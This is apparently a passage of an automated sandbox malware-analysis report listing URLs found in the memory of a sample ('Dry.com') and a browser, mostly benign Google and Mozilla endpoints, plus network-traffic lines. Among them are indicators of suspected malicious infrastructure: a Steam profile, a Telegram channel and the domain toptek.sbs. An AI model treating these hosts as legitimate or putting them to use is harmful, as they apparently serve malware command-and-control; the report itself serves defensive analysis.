                Source: chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
                Source: chrome.exe, 0000000F.00000003.2023113077.0000335C001C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                Source: chrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078082354.0000335C02F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 0000000F.00000003.2084657572.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: chrome.exe, 0000000F.00000003.2072617202.0000335C0271C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2065904669.0000335C0271C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077118601.0000335C0272C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033832195.0000335C007DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033832195.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033832195.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033832195.0000335C007DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033832195.0000335C007DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                Source: chrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078082354.0000335C02F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Dry.com, 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2461862261.0000000003F91000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842430157.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842551934.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Dry.com, 0000000A.00000002.2458694756.0000000001616000.00000004.00000020.00020000.00000000.sdmp, GDT0R9.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Dry.com, 0000000A.00000002.2458694756.00000000015F1000.00000004.00000020.00020000.00000000.sdmp, GDT0R9.10.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Dry.com, 0000000A.00000002.2458694756.0000000001616000.00000004.00000020.00020000.00000000.sdmp, GDT0R9.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Dry.com, 0000000A.00000002.2458694756.00000000015F1000.00000004.00000020.00020000.00000000.sdmp, GDT0R9.10.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Dry.com, 0000000A.00000003.1842133810.0000000001650000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842191783.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842628658.0000000001639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Dry.com, 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Dry.com, 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/2
                Source: Dry.com, 0000000A.00000003.1842133810.0000000001650000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842191783.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842628658.0000000001639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Dry.com, 0000000A.00000003.1842774905.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2461862261.0000000003FDD000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842371095.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842833283.000000000165D000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2458694756.000000000157D000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459089556.0000000001638000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2461862261.0000000003F91000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842430157.00000000015C5000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842551934.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Dry.com, 0000000A.00000003.1842719771.00000000015A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: Dry.com, 0000000A.00000002.2459089556.0000000001674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelr
                Source: Dry.com, 0000000A.00000002.2459089556.0000000001674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelt
                Source: Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs
                Source: Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/
                Source: Dry.com, 0000000A.00000002.2461862261.000000000413C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbses
                Source: Dry.com, 0000000A.00000002.2461862261.000000000400C000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2461862261.0000000003FB9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbsosh;
                Source: Dry.com, 0000000A.00000002.2461862261.0000000003FDD000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: Dry.com.1.dr, Saved.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: Saved.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 0000000F.00000003.2036290539.0000335C00CC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs3
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, EKXT2N.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icocom/3625
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoesizing
                Source: chrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078082354.0000335C02F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2074815994.0000335C02A10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 0000000F.00000003.2079047729.0000335C03034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000003.2078148106.0000335C03080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2079047729.0000335C03034000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Dry.com, 0000000A.00000002.2463740067.0000000006AC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: 9EI7wrGs4K.exeString found in binary or memory: https://www.ssl.com/repository0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
